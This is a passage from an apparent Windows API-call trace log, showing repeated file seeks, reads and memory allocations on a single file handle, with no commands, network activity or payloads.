lpBuffer=0x208cea0, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x75e, lpOverlapped=0x0) returned 1 [0112.833] malloc (_Size=0x48) returned 0x12ef34c0 [0112.833] malloc (_Size=0x48) returned 0x12ef2cf0 [0112.834] free (_Block=0x12ef43d0) [0112.834] free (_Block=0x12ef29d0) [0112.836] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x50b5, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=20661) returned 1 [0112.836] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.836] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x511a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=20762) returned 1 [0112.836] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x115, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x115, lpOverlapped=0x0) returned 1 [0112.838] malloc (_Size=0x48) returned 0x12ef29d0 [0112.838] malloc (_Size=0x25) returned 0x12ef06f0 [0112.839] free (_Block=0x12ef2cf0) [0112.839] free (_Block=0x12ef34c0) [0112.841] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x523f, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=21055) returned 1 [0112.841] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.841] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x5281, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=21121) returned 1 [0112.841] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x3bc, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x3bc, lpOverlapped=0x0) returned 1 [0112.842] malloc (_Size=0x48) returned 0x12ef2b10 [0112.842] malloc (_Size=0x30) returned 0x12ef43d0 [0112.843] free (_Block=0x12ef06f0) [0112.843] free (_Block=0x12ef29d0) [0112.844] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x564d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=22093) returned 1 [0112.845] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.845] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x569a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=22170) returned 1 [0112.845] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x100c, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x100c, lpOverlapped=0x0) returned 1 [0112.846] malloc (_Size=0x48) returned 0x12ef29d0 [0112.846] malloc (_Size=0x2d) returned 0x12ef4410 [0112.846] free (_Block=0x12ef43d0) [0112.847] free (_Block=0x12ef2b10) [0112.848] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x66b6, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=26294) returned 1 [0112.849] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.849] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x6700, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=26368) returned 1 [0112.849] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xab5, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xab5, lpOverlapped=0x0) returned 1 [0112.857] malloc (_Size=0x48) returned 0x12ef2fc0 [0112.857] malloc (_Size=0x30) returned 0x12ef43d0 [0112.858] free (_Block=0x12ef4410) [0112.858] free (_Block=0x12ef29d0) [0112.860] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x71c5, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=29125) returned 1 [0112.860] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.860] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7212, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=29202) returned 1 [0112.860] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x596, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x596, lpOverlapped=0x0) returned 1 [0112.862] malloc (_Size=0x48) returned 0x12ef2b10 [0112.862] malloc (_Size=0x3d) returned 0x12ef2cf0 [0112.862] free (_Block=0x12ef43d0) [0112.863] free (_Block=0x12ef2fc0) [0112.865] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x77b8, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=30648) returned 1 [0112.865] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.865] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7812, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=30738) returned 1 [0112.865] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x37d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x37d, lpOverlapped=0x0) returned 1 [0112.866] malloc (_Size=0x48) returned 0x12ef2d40 [0112.867] malloc (_Size=0x3d) returned 0x12ef2fc0 [0112.867] free (_Block=0x12ef2cf0) [0112.868] free (_Block=0x12ef2b10) [0112.872] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7b9f, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=31647) returned 1 [0112.872] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.872] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7bf9, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=31737) returned 1 [0112.872] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x128, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x128, lpOverlapped=0x0) returned 1 [0112.873] malloc (_Size=0x48) returned 0x12ef34c0 [0112.873] malloc (_Size=0x2a) returned 0x12ef43d0 [0112.874] free (_Block=0x12ef2fc0) [0112.874] free (_Block=0x12ef2d40) [0112.875] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7d31, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=32049) returned 1 [0112.875] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.875] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7d78, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=32120) returned 1 [0112.876] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x478, lpOverlapped=0x0) returned 1 [0112.877] malloc (_Size=0x48) returned 0x12ef29d0 [0112.877] malloc (_Size=0x2d) returned 0x12ef4410 [0112.877] free (_Block=0x12ef43d0) [0112.877] free (_Block=0x12ef34c0) [0112.879] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8200, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=33280) returned 1 [0112.879] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.879] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x824a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=33354) returned 1 [0112.879] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x4d7, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x4d7, lpOverlapped=0x0) returned 1 [0112.881] malloc (_Size=0x48) returned 0x12ef2cf0 [0112.881] malloc (_Size=0x34) returned 0x12ef43d0 [0112.881] free (_Block=0x12ef4410) [0112.881] free (_Block=0x12ef29d0) [0112.883] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8731, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=34609) returned 1 [0112.883] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.883] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8782, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=34690) returned 1 [0112.883] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xf3, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xf3, lpOverlapped=0x0) returned 1 [0112.886] malloc (_Size=0x48) returned 0x12ef29d0 [0112.886] malloc (_Size=0x3d) returned 0x12ef34c0 [0112.887] free (_Block=0x12ef43d0) [0112.887] free (_Block=0x12ef2cf0) [0112.889] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8885, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=34949) returned 1 [0112.889] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.889] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x88df, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=35039) returned 1 [0112.889] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x148, lpOverlapped=0x0) returned 1 [0112.890] malloc (_Size=0x48) returned 0x12ef2b10 [0112.890] malloc (_Size=0x33) returned 0x12ef43d0 [0112.890] free (_Block=0x12ef34c0) [0112.891] free (_Block=0x12ef29d0) [0112.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8a37, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=35383) returned 1 [0112.892] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.892] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8a87, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=35463) returned 1 [0112.892] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xe1, lpOverlapped=0x0) returned 1 [0112.894] malloc (_Size=0x48) returned 0x12ef34c0 [0112.894] malloc (_Size=0x2b) returned 0x12ef4410 [0112.894] free (_Block=0x12ef43d0) [0112.894] free (_Block=0x12ef2b10) [0112.896] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8b78, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=35704) returned 1 [0112.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.896] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8bc0, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=35776) returned 1 [0112.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x109, lpOverlapped=0x0) returned 1 [0112.898] malloc (_Size=0x48) returned 0x12ef29d0 [0112.898] malloc (_Size=0x34) returned 0x12ef43d0 [0112.898] free (_Block=0x12ef4410) [0112.899] free (_Block=0x12ef34c0) [0112.901] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8cd9, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=36057) returned 1 [0112.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.901] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8d2a, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=36138) returned 1 [0112.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x174, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x174, lpOverlapped=0x0) returned 1 [0112.904] malloc (_Size=0x48) returned 0x12ef2b10 [0112.904] malloc (_Size=0x2f) returned 0x12ef4410 [0112.905] free (_Block=0x12ef43d0) [0112.905] free (_Block=0x12ef29d0) [0112.906] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8eae, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=36526) returned 1 [0112.907] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.907] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8efa, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=36602) returned 1 [0112.907] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x30e, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x30e, lpOverlapped=0x0) returned 1 [0112.908] malloc (_Size=0x48) returned 0x12ef34c0 [0112.908] malloc (_Size=0x36) returned 0x12ef43d0 [0112.909] free (_Block=0x12ef4410) [0112.909] free (_Block=0x12ef2b10) [0112.910] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x9218, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=37400) returned 1 [0112.911] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.911] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x926b, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=37483) returned 1 [0112.911] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x105, lpOverlapped=0x0) returned 1 [0112.912] malloc (_Size=0x48) returned 0x12ef2cf0 [0112.912] malloc (_Size=0x2d) returned 0x12ef4410 [0112.913] free (_Block=0x12ef43d0) [0112.913] free (_Block=0x12ef34c0) [0112.915] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x9380, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=37760) returned 1 [0112.915] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.915] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x93ca, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=37834) returned 1 [0112.915] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xc9d, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xc9d, lpOverlapped=0x0) returned 1 [0112.916] malloc (_Size=0x48) returned 0x12ef2b10 [0112.916] malloc (_Size=0x43) returned 0x12ef29d0 [0112.916] free (_Block=0x12ef4410) [0112.917] free (_Block=0x12ef2cf0) [0112.919] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xa077, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=41079) returned 1 [0112.919] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.919] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xa0d7, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=41175) returned 1 [0112.919] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x138, lpOverlapped=0x0) returned 1 [0112.920] malloc (_Size=0x48) returned 0x12ef2fc0 [0112.920] malloc (_Size=0x2c) returned 0x12ef43d0 [0112.921] free (_Block=0x12ef29d0) [0112.921] free (_Block=0x12ef2b10) [0112.923] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xa21f, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=41503) returned 1 [0112.923] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.923] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xa268, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=41576) returned 1 [0112.923] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xb05, lpOverlapped=0x0) returned 1 [0112.924] malloc (_Size=0x48) returned 0x12ef2cf0 [0112.924] malloc (_Size=0x2e) returned 0x12ef4410 [0112.925] free (_Block=0x12ef43d0) [0112.925] free (_Block=0x12ef2fc0) [0112.927] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xad7d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=44413) returned 1 [0112.927] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.927] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xadc8, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=44488) returned 1 [0112.927] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x335, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x335, lpOverlapped=0x0) returned 1 [0112.928] malloc (_Size=0x48) returned 0x12ef2d40 [0112.928] malloc (_Size=0x33) returned 0x12ef43d0 [0112.929] free (_Block=0x12ef4410) [0112.929] free (_Block=0x12ef2cf0) [0112.934] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xb10d, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=45325) returned 1 [0112.934] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.934] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xb15d, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=45405) returned 1 [0112.934] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x6b9, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x6b9, lpOverlapped=0x0) returned 1 [0112.935] malloc (_Size=0x48) returned 0x12ef2fc0 [0112.936] malloc (_Size=0x32) returned 0x12ef4410 [0112.936] free (_Block=0x12ef43d0) [0112.937] free (_Block=0x12ef2d40) [0112.938] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xb826, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=47142) returned 1 [0112.938] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.938] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xb875, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=47221) returned 1 [0112.938] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x167, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x167, lpOverlapped=0x0) returned 1 [0112.939] malloc (_Size=0x48) returned 0x12ef2b10 [0112.939] malloc (_Size=0x36) returned 0x12ef43d0 [0112.940] free (_Block=0x12ef4410) [0112.940] free (_Block=0x12ef2fc0) [0112.942] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xb9ec, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=47596) returned 1 [0112.942] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.942] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xba3f, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=47679) returned 1 [0112.942] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0xaaf, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0xaaf, lpOverlapped=0x0) returned 1 [0112.944] malloc (_Size=0x48) returned 0x12ef34c0 [0112.944] malloc (_Size=0x2c) returned 0x12ef4410 [0112.945] free (_Block=0x12ef43d0) [0112.945] free (_Block=0x12ef2b10) [0112.948] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xc4fe, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=50430) returned 1 [0112.948] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.948] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xc547, lpNewFilePointer=0x208cd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd90*=50503) returned 1 [0112.948] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cea0, nNumberOfBytesToRead=0x655, lpNumberOfBytesRead=0x208cd60, lpOverlapped=0x0 | out: lpBuffer=0x208cea0*, lpNumberOfBytesRead=0x208cd60*=0x655, lpOverlapped=0x0) returned 1 [0112.949] malloc (_Size=0x48) returned 0x12ef29d0 [0112.949] malloc (_Size=0x2f) returned 0x12ef43d0 [0112.950] free (_Block=0x12ef4410) [0112.950] free (_Block=0x12ef34c0) [0112.951] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xcbac, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=52140) returned 1 [0112.952] ReadFile (in: hFile=0x2d0, lpBuffer=0x208cd80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x208cd80*, lpNumberOfBytesRead=0x208cd00*=0x1e, lpOverlapped=0x0) returned 1 [0112.952] SetFilePointerEx (in: hFile=0x2d0, 